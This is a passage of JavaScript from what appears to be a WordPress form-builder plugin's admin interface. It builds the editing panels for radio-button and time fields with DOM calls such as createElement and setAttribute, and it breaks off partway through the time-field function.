		el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_checkbox')");
	var el_attr_table = document.createElement('table');
		el_attr_table.setAttribute("id", 'attributes');
		el_attr_table.setAttribute("border", '0');
		el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
		el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
		el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
		el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
		el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
		el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
		el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++) {	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_checkbox')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_checkbox')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			
		el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_checkbox')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
	}

	var el_choices_label = document.createElement('label');
		el_choices_label.setAttribute("class", "fm-field-label");
		el_choices_label.innerHTML = "Options ";

	var el_choices_add = document.createElement('img');
		el_choices_add.setAttribute("id", "el_choices_add");
		el_choices_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
		el_choices_add.style.cssText = 'cursor:pointer;';
		el_choices_add.setAttribute("title", 'add');
		el_choices_add.setAttribute("onClick", "add_choise('radio',"+i+")");
	var	el_choices_add_text = document.createElement("span");
		el_choices_add_text.style.cssText ="font-size: 12px; padding-left:7px; font-weight:bold; cursor:pointer;";
		el_choices_add_text.innerHTML ="Add option(s)";				
		el_choices_add_text.setAttribute("onClick", "add_choise('radio',"+i+")");
		
	var el_choices_select = document.createElement('a');
	    el_choices_select.style.cssText ="color:#000; font-weight:bold; font-size: 13px; cursor:pointer; padding-top:10px; display:block;";
		el_choices_select.innerHTML = "Select options from database";
		el_choices_select.setAttribute("rel", "{handler: 'iframe', size: {x: 530, y: 370}}"	);
		el_choices_select.setAttribute("onclick","tb_show('', 'admin-ajax.php?action=select_data_from_db&field_id="+i+"&field_type=radio&value_disabled="+w_value_disabled+"&width=530&height=370&TB_iframe=1')");
		el_choices_select.setAttribute("class","modal");			
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	var br7 = document.createElement('br');

	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);
	
	edit_main_td10.appendChild(el_label_size_label);
	edit_main_td10_1.appendChild(el_label_size);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);
	
	edit_main_td3.appendChild(el_label_flow);
	edit_main_td3_1.appendChild(el_flow_vertical);
	edit_main_td3_1.appendChild(el_label_vertical);
	edit_main_td3_1.appendChild(br1);
	edit_main_td3_1.appendChild(el_flow_horizontal);
	edit_main_td3_1.appendChild(el_label_horizontal);
	
	edit_main_td13.appendChild(el_disable_value_label);
	edit_main_td13_1.appendChild(el_disable_value);
	
	edit_main_td11.appendChild(el_rowcol_label);
	edit_main_td11_1.appendChild(el_rowcol_textarea);

	edit_main_td6.appendChild(el_style_label);
	edit_main_td6_1.appendChild(el_style_textarea);
	
	edit_main_td5.appendChild(el_required_label);
	edit_main_td5_1.appendChild(el_required);
	
	edit_main_td8.appendChild(el_randomize_label);
	edit_main_td8_1.appendChild(el_randomize);
	
	edit_main_td12.appendChild(el_option_position_label);
	edit_main_td12_1.appendChild(el_option_position1);
	edit_main_td12_1.appendChild(el_option_left);
	edit_main_td12_1.appendChild(br2);
	edit_main_td12_1.appendChild(el_option_position2);
	edit_main_td12_1.appendChild(el_option_right);
	
	edit_main_td9.appendChild(el_allow_other_label);
	edit_main_td9_1.appendChild(el_allow_other);
	
	
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br6);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");
	
	edit_main_td4.appendChild(el_choices_label);
	edit_main_td4_1.appendChild(br7);
	edit_main_td4_1.appendChild(el_choices_add);
	edit_main_td4_1.appendChild(el_choices_add_text);
	edit_main_td4_1.appendChild(el_choices_select);

	var div_ = document.createElement('div');
		div_.style.cssText = 'border-bottom:1px dotted black; width: 275px;';
	var br = document.createElement('br');
		
	var el_choices_mini_label = document.createElement('b');
		el_choices_mini_label.innerHTML="Name";
		el_choices_mini_label.style.cssText='padding-right: 40px; padding-left: 40px; font-size:9px';

	var el_choices_value_mini_label = document.createElement('b');
		el_choices_value_mini_label.innerHTML="Value";
		el_choices_value_mini_label.style.cssText='padding-right: 38px; padding-left: 38px; font-size:9px; font-weight:bold;';
		
	var el_choices_dis_mini_label = document.createElement('b');
		el_choices_dis_mini_label.innerHTML="Delete";
		el_choices_dis_mini_label.style.cssText='padding-left: 3px; padding-right: 3px; font-size:9px; font-weight:bold;';
	
	var el_choices_move_mini_label = document.createElement('b');
		el_choices_move_mini_label.innerHTML="Move";
		el_choices_move_mini_label.style.cssText='padding-left: 3px; padding-right: 3px; font-size:9px; font-weight:bold;';		
	
	div_.appendChild(br);
	div_.appendChild(el_choices_mini_label);
	div_.appendChild(el_choices_value_mini_label);
	div_.appendChild(el_choices_dis_mini_label);
	div_.appendChild(el_choices_move_mini_label);
	edit_main_td4.appendChild(div_);
						
	aaa=false;
	n=w_choices.length;
	for(j=0; j<n; j++) {	
		var div = document.createElement('div');
			div.setAttribute("id", j);
			div.setAttribute("class", "change_pos");
			
		var el_choices = document.createElement('input');
			el_choices.setAttribute("id", "el_choices"+j);
			el_choices.setAttribute("class", "fm-field-choice");
			el_choices.setAttribute("type", "text");
			if(w_allow_other=="yes" && j==w_allow_other_num)
			el_choices.setAttribute("other", '1');
			el_choices.setAttribute("value", w_choices[j]);
			el_choices.setAttribute("checked", w_choices_checked[j]);
			el_choices.setAttribute("onKeyUp", "change_label('"+i+"_label_element"+j+"', this.value)");
			el_choices.setAttribute("onpaste", "elem = this; change_label_name_on_paste('"+j+"', '"+i+"_label_element"+j+"', 'radio'); change_label_value_on_paste('"+i+"_elementform_id_temp"+j+"', this)");	
			if(w_choices_params[j])
				el_choices.setAttribute("disabled", 'disabled');
	
		var el_choices_value = document.createElement('input');
			el_choices_value.setAttribute("id", "el_option_value"+j);
			if(!w_choices_params[j] && (w_allow_other!="yes" || j!=w_allow_other_num))
				el_choices_value.setAttribute("class", "el_option_value fm-field-choice");
			else
				el_choices_value.setAttribute("class", "fm-field-choice");
			el_choices_value.setAttribute("type", "text");
			el_choices_value.setAttribute("value", w_choices_value[j]);
			el_choices_value.setAttribute("onKeyUp", "change_label_value('"+i+"_elementform_id_temp"+j+"', this.value)");
			el_choices_value.setAttribute("onpaste", "change_label_value_on_paste('"+i+"_elementform_id_temp"+j+"', this)");
			if(w_value_disabled=='no' || w_choices_params[j] || (w_allow_other=="yes" && j==w_allow_other_num))
				el_choices_value.setAttribute("disabled", 'disabled');
	
		var el_choices_params = document.createElement('input');
			el_choices_params.setAttribute("id", "el_option_params"+j);
			el_choices_params.setAttribute("class", "el_option_params");
			el_choices_params.setAttribute("type", "hidden");
			el_choices_params.setAttribute("value", w_choices_params[j]);
	
		var el_choices_remove = document.createElement('img');
			el_choices_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_choices_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
		if(w_allow_other=="yes" && j==w_allow_other_num)
			el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px; display:none';
		else			
			el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			el_choices_remove.setAttribute("align", 'top');
			el_choices_remove.setAttribute("onClick", "remove_choise("+j+","+i+",'radio')");
			
		var el_choices_handle = document.createElement('img');
			el_choices_handle.setAttribute("class", "el_choices_sortable");
			el_choices_handle.setAttribute("src", plugin_url + '/images/move_cursor.png?ver=1.8.0');		
			if(w_allow_other=="yes" && j==w_allow_other_num)			
				el_choices_handle.style.cssText = 'cursor:move; vertical-align:middle; margin:2px 0px 2px 34px;';
			else	
				el_choices_handle.style.cssText = 'cursor:move; vertical-align:middle; margin:2px;';
			el_choices_handle.setAttribute("align", 'top');
	
			
		div.appendChild(el_choices);
		div.appendChild(el_choices_value);	
		div.appendChild(el_choices_remove);
		div.appendChild(el_choices_handle);
		div.appendChild(el_choices_params);
		edit_main_td4.appendChild(div);
		if(w_choices_checked[j]==true)
			if(w_allow_other=="yes" && j==w_allow_other_num)
				aaa=true;
	}
	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr10.appendChild(edit_main_td10);
	edit_main_tr10.appendChild(edit_main_td10_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr13.appendChild(edit_main_td13);
	edit_main_tr13.appendChild(edit_main_td13_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr12.appendChild(edit_main_td12);
	edit_main_tr12.appendChild(edit_main_td12_1);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_tr11.appendChild(edit_main_td11);
	edit_main_tr11.appendChild(edit_main_td11_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr10);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr11);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr12);
	edit_main_table.appendChild(edit_main_tr13);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	
	element='input';	
	type='radio'; 
	var adding_type = document.createElement("input");
		adding_type.setAttribute("type", "hidden");
		adding_type.setAttribute("value", "type_radio");
		adding_type.setAttribute("name", i+"_typeform_id_temp");
		adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
		adding_required.setAttribute("type", "hidden");
		adding_required.setAttribute("value", w_required);
		adding_required.setAttribute("name", i+"_requiredform_id_temp");			
		adding_required.setAttribute("id", i+"_requiredform_id_temp");
	    
	var adding_randomize = document.createElement("input");
		adding_randomize.setAttribute("type", "hidden");
		adding_randomize.setAttribute("value", w_randomize);
		adding_randomize.setAttribute("name", i+"_randomizeform_id_temp");			
		adding_randomize.setAttribute("id", i+"_randomizeform_id_temp");
	    
	var adding_allow_other= document.createElement("input");
		adding_allow_other.setAttribute("type", "hidden");
		adding_allow_other.setAttribute("value", w_allow_other);
		adding_allow_other.setAttribute("name", i+"_allow_otherform_id_temp");			
		adding_allow_other.setAttribute("id", i+"_allow_otherform_id_temp");
	 
	var adding_rowcol= document.createElement("input");
		adding_rowcol.setAttribute("type", "hidden");
		adding_rowcol.setAttribute("value", w_rowcol);
		adding_rowcol.setAttribute("name", i+"_rowcol_numform_id_temp");			
		adding_rowcol.setAttribute("id", i+"_rowcol_numform_id_temp");
		
	var adding_option_left_right= document.createElement("input");
		adding_option_left_right.setAttribute("type", "hidden");
		adding_option_left_right.setAttribute("value", w_field_option_pos);	
		adding_option_left_right.setAttribute("id", i+"_option_left_right");	
			
	var adding_value_disabled = document.createElement("input");
		adding_value_disabled.setAttribute("type", "hidden");
		adding_value_disabled.setAttribute("value", w_value_disabled);
		adding_value_disabled.setAttribute("name", i+"_value_disabledform_id_temp");	
		adding_value_disabled.setAttribute("id", i+"_value_disabledform_id_temp"); 				
	
	var div = document.createElement('div');
		div.setAttribute("id", "main_div");
			
	var div_field = document.createElement('div');
		div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
						
	var div_label = document.createElement('div');
		div_label.setAttribute("align", 'left');
		div_label.style.display="table-cell";
		div_label.style.width=w_field_label_size+"px";
		div_label.setAttribute("id", i+"_label_sectionform_id_temp");
		
	var div_element = document.createElement('div');
		div_element.setAttribute("align", 'left');
		div_element.style.display="table-cell";
		div_element.setAttribute("id", i+"_element_sectionform_id_temp");

	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');	
	
	var table_little_t = document.createElement('div');
		table_little_t.style.display="table";
		
	var table_little = document.createElement('div');
		table_little.setAttribute("id", i+"_table_little");
		table_little.style.display="table-row-group";
			
	table_little_t.appendChild(table_little);
	
	var tr_little1 = document.createElement('div');
		tr_little1.setAttribute("id", i+"_element_tr1");
		tr_little1.style.display="table-row";
	
	var tr_little2 = document.createElement('div');
		tr_little2.setAttribute("id", i+"_element_tr2");
		tr_little2.style.display="table-row";
		
	var td_little1 = document.createElement('div');
		td_little1.setAttribute("valign", 'top');
		td_little1.setAttribute("id", i+"_td_little1");
		td_little1.style.display="table-cell";
		
	var td_little2 = document.createElement('div');
		td_little2.setAttribute("valign", 'top');
		td_little2.setAttribute("id", i+"_td_little2");
		td_little2.style.display="table-cell";
			
	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = w_field_label;
		label.setAttribute("class", "label");
		label.style.verticalAlign="top";
	
	var required = document.createElement('span');
		required.setAttribute("id", i+"_required_elementform_id_temp");
		required.innerHTML = "";
		required.setAttribute("class", "required");
		required.style.verticalAlign="top";
		if(w_required=="yes")
			required.innerHTML = " *";
	    
	var main_td  = document.getElementById('show_table');

  
	div_label.appendChild(label);
	div_label.appendChild(required);
	div_element.appendChild(adding_type);

	div_element.appendChild(adding_required);
	div_element.appendChild(adding_randomize);
	div_element.appendChild(adding_allow_other);
	div_element.appendChild(adding_rowcol);
	div_element.appendChild(adding_option_left_right);
	div_element.appendChild(adding_value_disabled);
	div_element.appendChild(table_little_t);
	div_field.appendChild(div_label);
	div_field.appendChild(div_element);

	div.appendChild(div_field);
	div.appendChild(br3);
	main_td.appendChild(div);
		
	if(w_field_label_pos=="top")
		label_top(i);
		
	change_class(w_class, i);
	refresh_attr(i, 'type_checkbox');

	refresh_rowcol(i, 'radio');
	add_id_and_name(i, 'type_radio');
	if(aaa)
		show_other_input(i);
	
	jQuery(function() {
		jQuery( "#choices" ).sortable({ 
			items: ".change_pos" ,
			handle: ".el_choices_sortable",
			update: function(event, ui) {		
				refresh_rowcol(i, 'radio');
				refresh_id_name(i, 'type_radio');
			}
		});	
	});
}

function type_time(i, w_field_label, w_field_label_size, w_field_label_pos, w_time_type, w_am_pm, w_sec, w_hh, w_mm, w_ss, w_mini_labels, w_required, w_class, w_attr_name, w_attr_value) {
	
	document.getElementById("element_type").value="type_time";
	delete_last_child();
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');

	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');	
		  
	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("class", "fm-field-label");
		el_label_label.setAttribute("for", "edit_for_label");
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
	
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");
	
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";

	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");

	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
		el_label_left.innerHTML = "Left";	

	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");

	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
		el_label_top.innerHTML = "Top";
		
	if(w_field_label_pos=="top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");

	var el_label_time_type_label = document.createElement('label');
	    el_label_time_type_label.setAttribute("class", "fm-field-label");
		el_label_time_type_label.setAttribute("for", "el_label_time_type1");
		el_label_time_type_label.innerHTML = "Time Format";
	
	var el_label_time_type1 = document.createElement('input');
                el_label_time_type1.setAttribute("id", "el_label_time_type1");
                el_label_time_type1.setAttribute("type", "radio");
                el_label_time_type1.setAttribute("value", "format_24");
                el_label_time_type1.setAttribute("name", "edit_for_time_type");
                el_label_time_type1.setAttribute("onchange", "format_24("+i+")");
		el_label_time_type1.setAttribute("checked", "checked");
		hour_24 = document.createTextNode("24 hour");
		
	var el_label_time_type2 = document.createElement('input');
                el_label_time_type2.setAttribute("id", "el_label_time_type2");
                el_label_time_type2.setAttribute("type", "radio");
                el_label_time_type2.setAttribute("value", "format_12");
                el_label_time_type2.setAttribute("name", "edit_for_time_type");
                el_label_time_type2.setAttribute("onchange", "format_12("+i+", 'am','', '','')");
		am_pm = document.createTextNode("12 hour");
		
	if(w_time_type=="24")
	
				el_label_time_type1.setAttribute("checked", "checked");
	else
				el_label_time_type2.setAttribute("checked", "checked");

	var el_label_second_label = document.createElement('label');
	    el_label_second_label.setAttribute("class", "fm-field-label");
		el_label_second_label.setAttribute("for", "el_second_yes");
		el_label_second_label.innerHTML = "Display Seconds";
	
	var el_second_yes = document.createElement('input');
                el_second_yes.setAttribute("id", "el_second_yes");
                el_second_yes.setAttribute("type", "radio");
                el_second_yes.setAttribute("value", "yes");
                el_second_yes.setAttribute("name", "edit_for_time_second");
                el_second_yes.setAttribute("onchange", "second_yes("+i+",'"+w_ss+"')");
		el_second_yes.setAttribute("checked", "checked");
		display_seconds = document.createTextNode("Yes");
		
	var el_second_no = document.createElement('input');
                el_second_no.setAttribute("id", "el_second_no");
                el_second_no.setAttribute("type", "radio");
                el_second_no.setAttribute("value", "no");
                el_second_no.setAttribute("name", "edit_for_time_second");
                el_second_no.setAttribute("onchange", "second_no("+i+")");
		dont_display_seconds = document.createTextNode("No");
		
	if(w_sec=="1")
	
				el_second_yes.setAttribute("checked", "checked");
	else
				el_second_no.setAttribute("checked", "checked");
	var el_style_label = document.createElement('label');
	    el_style_label.setAttribute("class", "fm-field-label");
		el_style_label.setAttribute("for", "el_style_textarea");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "el_style_textarea");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
                
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_required_label = document.createElement('label');
		el_required_label.setAttribute("class", "fm-field-label");
	        el_required_label.setAttribute("for", "el_required");
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_required");
                el_required.setAttribute("type", "checkbox");
                
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			
                el_required.setAttribute("checked", "checked");
	var el_attr_label = document.createElement('label');
	    el_attr_label.setAttribute("class", "fm-field-label");                   
			el_attr_label.innerHTML = "Additional Attributes";
			
	var el_attr_add = document.createElement('img');
                
           	el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_time')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_time')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_time')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_time')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);
	
	edit_main_td8.appendChild(el_label_size_label);
	edit_main_td8_1.appendChild(el_label_size);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);
	
	edit_main_td3.appendChild(el_label_time_type_label);
	edit_main_td3_1.appendChild(el_label_time_type1);
	edit_main_td3_1.appendChild(hour_24);
	edit_main_td3_1.appendChild(br6);
	edit_main_td3_1.appendChild(el_label_time_type2);
	edit_main_td3_1.appendChild(am_pm);
	
	edit_main_td4.appendChild(el_label_second_label);
	edit_main_td4_1.appendChild(el_second_yes);
	edit_main_td4_1.appendChild(display_seconds);
	edit_main_td4_1.appendChild(br4);
	edit_main_td4_1.appendChild(el_second_no);
	edit_main_td4_1.appendChild(dont_display_seconds);
	
	edit_main_td5.appendChild(el_style_label);
	edit_main_td5_1.appendChild(el_style_textarea);
	
	edit_main_td6.appendChild(el_required_label);
	edit_main_td6_1.appendChild(el_required);

	
	
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br6);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
